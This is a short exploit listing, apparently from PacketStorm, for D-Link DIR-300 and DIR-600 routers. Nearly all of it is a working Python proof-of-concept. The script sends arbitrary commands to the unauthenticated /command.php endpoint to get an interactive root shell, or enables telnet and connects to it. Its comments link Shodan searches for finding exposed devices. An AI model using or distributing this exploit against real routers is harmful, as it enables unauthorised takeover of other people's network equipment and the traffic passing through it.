D-LINK DIR-300 / DIR-600 Remote Root

[Praetorian503]

This exploit demonstrates the remote root vulnerability discovered by Michael Messner in D-Link DIR-300 and DIR-600 devices.

#!/usr/bin/python
# D-LINK TOTAL FAIL
# http://www.s3cur1ty.de/m1adv2013-003
# Another Shit PoC by infodox
# SHODANS BELOW
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300
# http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600
# Who knew a shell could be so easy?
import sys
import requests
import os

if len(sys.argv) != 3:
    print "Usage: ./dlinkroot.py <target> <mode>"
    print "Modes: shell or telnetenable"
    print "I was lazy so I assume you have a telnet client"
    sys.exit(0)

target = sys.argv[1]
mode = sys.argv[2]

def shell(target):
    print "[+] Connecting and spawning a shell..."
    while True:
        try:
            bobcat = raw_input("%s:~# " %(target))
            lulz = "cmd=%s;" %(bobcat)
            url = "http://" + target + "/command.php"
            hax = requests.post(url, lulz)
            print hax.text
        except KeyboardInterrupt:
            print "\n[-] Quitting"
            sys.exit(1)

def telnetenable(target):
    lulz = "cmd=telnetd;"
    url = "http://" + target + "/command.php"
    print "[+] Trying to enable telnet"
    try:
        hax = requests.post(url, lulz)
        print hax.text
    except Exception:
        print "[-] IT FAILED IT!"
        sys.exit(0)
    print "[+] Doing a telnet"
    try:
        os.system('telnet %s') %(target)
    except Exception:
        print "[-] IT FAILED IT!"
        sys.exit(1)

if mode == "shell":
    shell(target)
elif mode == "telnetenable":
    telnetenable(target)
else:
    print "[] WHAT THE FUCK YOU'RE DOING IT WRONG!"

Source: PacketStorm